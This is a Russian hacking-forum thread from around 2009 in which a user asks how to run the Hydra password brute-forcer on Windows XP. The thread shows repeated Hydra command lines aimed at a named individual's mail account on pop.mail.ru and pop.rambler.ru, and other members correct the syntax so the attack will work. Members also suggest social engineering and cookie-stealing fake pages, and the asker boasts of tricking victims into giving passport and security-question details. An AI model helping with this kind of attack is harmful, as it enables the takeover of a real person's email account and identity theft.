• XSS.stack #1 – первый литературный журнал от юзеров форума

Hydra под Windows XP

Статус
Закрыто для дальнейших ответов.

lipchanin

HDD-drive
Пользователь
Реакции
0
Собственно интересует, есть ли Hydra чтобы не из командной строки работает, а прямо из под Windows XP? Если такая имеется, дайте ссылочку откуда скачать пожалуйста.
P.S.:На форуме нашёл тему похожую, но там ссылка не работает.

Насколько мне известно оффициального GUI интервейса у гидры под винду нету.
Есть под линукс смотреть здесь!
И есть неофициальный смотреть здесь. (Использовать на свой страх и риск, и он, насколько я понял, платный. В тестовой версии разрешено использование в течении 15 дней или 50 запусков).

CUI тоже сила.

пусть не в тему, но принято называть CLI, а не CUI ( я так понимаю это Console User Interface имели виду), давайте не будем изобретать велосипед.

Никто ничего не изобретал, если вы готовы поспорить с сообществом Википедии, то даже я не решусь на спор с вами:

http://ru.wikipedia.org/wiki/CUI

Термин же CLI относится немного к другому:

http://ru.wikipedia.org/wiki/%D0%98%D0%BD%...%BE%D0%BA%D0%B8

То, что мы обсуждаем в текущий момент - CUI. Это давно устоявшийся термин.

Зацените разницу:

Console User Interface (Текстовый интерфейс пользователя) - CUI

и

Command Line Interface (Интерфейс командной строки) - CLI

Не путайте эти вещи...

Ребят, у меня проблема в следующем заключается: через командную строку запускаю гидру, скачанную с сайта www.thc.org релиз 5.4 (уже собранная), всё вроде как запускается, но не могу начать брутиь. Описываю что делал: Создал в корне диска С каталог /1/ скопировал туда hydra. Теперь пробую запускать, Пуск>выполнить>cmd появляется надпись C:\Documents and Settings\Admin>
C:\1\hydra.exe -m /members -l natali_grjazeva c:\1\words.тхт -o c:\1\passlist.txt -t 10 -w 20 -f -v pop.mail.ru pop3 , программа запускается пишутся все команды, например –l username -P словарик и т.д., я ввожу все данные которые необходимо ввести, жму Enter мне выскакивает то что я ввёл, потом Syntax: (описание какая буква что значит и как вводить запрос насколькоя понял), потом Options (перечисляется какая буква что обозначает), потом предупреждение что гидру надо использовать только законно и сайт производителя, а потом опять C:\Documents and Settings\Admin> (при этом всё остальное вверху остаётся)

Вопрос: объясните пожалуйста как правильно запустить программу, чтобы она начала брутить?

lipchanin, то, что ты описал - неверный синтаксис команды. Я например на вскидку, скажу, что я не знаю, что означает ключ "-m /members"... Есть ключ там -M с указанием файла с серверами для параллельных атак... Может в этом проблема? Но тогда, если ты указываешь файл с хостами, то зачем явно указывать хост (pop.mail.ru) основным параметром? В общем расскажи что, как и зачем...

C:\1\hydra.exe ./hydra –l natali_grjazeva –p с:\1\words.txt –o c:\1\passlist.txt –f pop.rambler.ru pop3
ввожу это в командную строку, выскакивает то что я ввёл, потом Syntax: (описание какая буква что значит и как вводить запрос насколькоя понял), потом Options (перечисляется какая буква что обозначает), потом предупреждение что гидру надо использовать только законно и сайт производителя, а потом опять C:\Documents and Settings\Admin> брутить гидра не начинает почему то, в чем может быть проблема?

Добавлено в [time]1234214824[/time]
вроде надо какойто шелл ещё, что это и как его сделать?

Про проблему я тебе рассказал уже... Немного кривоватые ручки запускающего... :) К чему у тебя - ./hydra? Убери это нафик!

hydra.exe –l natali_grjazeva –p с:\1\words.txt –o c:\1\passlist.txt –f pop.rambler.ru pop3

З.Ы. Вот хакирь пошёл - даже прогу с консоли пустить не могут... Олдскул-сцена в гробу бы перевернулась...

Правильный путь вот такой C:\1\hydra.exe –l natali_grjazeva –p с:\1\words.txt –o c:\1\passlist.txt –f pop.rambler.ru pop3, но не брутит он ни фига

Зачем GUI неудобно же ?
например нмап и hydra можно парай строк на том же php perl bash связать а вот с гуи такое на прокатит )

Подскажите как правильно брутить начать
C:\1\hydra.exe –l natali_grjazeva –p с:\1\words.txt –o c:\1\passlist.txt –f pop.rambler.ru pop3 - путь вот такой, в итоге приходим опять к тому что мигает командная строка, а брутить не начинает

Зачем GUI неудобно же ?
Гуи неудобно ?! - бред, а удобно изучать параметры, вместо того чтобы вбить в готовую форму ?

например нмап и hydra можно парай строк на том же php perl bash связать а вот с гуи такое на прокатит )
Собственно зачем связывать ?!; с гуи не прокатит ?; вы ошибаетесь; вывод в лог файл, парсинг и последующая передача в hydra :\ На крайний случай dynamic data exchange

C:\1\hydra.exe –l natali_grjazeva –p с:\1\words.txt –o c:\1\passlist.txt –f pop.rambler.ru
Наверное всётаки так нуно:
cd C:\
hydra\hydra.exe -l natali_grjazeva -p slovar.txt -o otchet.txt -f pop.rambler.ru pop3
Потому как файлы то находятся в одном катологе.....
Для удобства создай несколько батников под разные нужды и всё!А вообще
брут с одного компа достаточьно неэффективный метод,лучше используй
соц инжинерию и фейк какой нить...Вообщем фантазия нужна.

salamandra
С социальной инжинерией я разобрался более или менее, развести людей можно даже на номер паспорта и девичью фамилию матери для восстановление якобы забытого пароля на мыло, а вот что такое фейк подскажи пожалуйста и как им пользоваться?

Инфа по теме:
http://forum.antichat.ru/threadnav72868-1-10.html
Видео по теме:
http://uploadbox.com/files/8b09d19b30
В видео показано как создать фейк с переноправлением на сниффер для
кражи кукисов!Такая техника использовалась ещё наверно лет сто назад
и до сих пор используется!Сработает,если только жертва откроет вложение
в веб интерфейсе!

salamandra

ввёл это и получил

C:\Documents and Settings\Admin>C:\1\hydra.exe -l natali_grjazeva -p words.txt -
o otchet.txt -f pop.mail.ru pop3
Hydra v5.4 © 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-02-11 21:38:31
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop.mail.ru (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-02-11 21:38:42

C:\Documents and Settings\Admin>

почему то атака идёт всего 11 секунд, или я опять что то не то делаю

Поможай плиз

Статус
Закрыто для дальнейших ответов.
Верх